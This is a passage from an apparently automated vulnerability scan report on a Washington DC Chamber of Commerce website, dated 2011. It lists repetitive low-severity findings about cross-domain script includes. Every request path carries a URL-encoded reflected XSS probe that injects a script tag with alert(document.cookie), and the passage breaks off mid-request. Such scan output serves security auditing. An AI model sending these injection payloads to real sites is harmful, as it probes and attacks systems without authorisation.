<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.35. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/DCLottery.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/DCLottery.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/DCLottery.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:34 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.36. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/FEDEX_CORP_LOGO1%20(2).PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/FEDEX_CORP_LOGO1%20(2).PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/FEDEX_CORP_LOGO1%20(2).PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:22 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.37. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/GWU_Logo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/GWU_Logo.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/GWU_Logo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:24 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.38. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/HollandKnight.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/HollandKnight.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/HollandKnight.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:18 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.39. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Howard%20University.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Howard%20University.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Howard%20University.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:20 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.40. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MacFarlane%20Partners.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MacFarlane%20Partners.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MacFarlane%20Partners.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:23 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.41. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MedStar.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MedStar.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MedStar.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:16 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.42. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Miller&Long.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Miller&Long.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Miller&Long.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:15 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.43. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/PNC_RGB.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/PNC_RGB.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/PNC_RGB.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:18 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.44. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/ReedSmith.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/ReedSmith.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/ReedSmith.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:25 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.45. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/SecuritasLogo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/SecuritasLogo.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/SecuritasLogo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:20 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.46. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/UDC.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/UDC.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/UDC.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:28 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.47. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WBJ.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WBJ.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WBJ.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:25 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.48. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WCSA.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WCSA.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WCSA.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
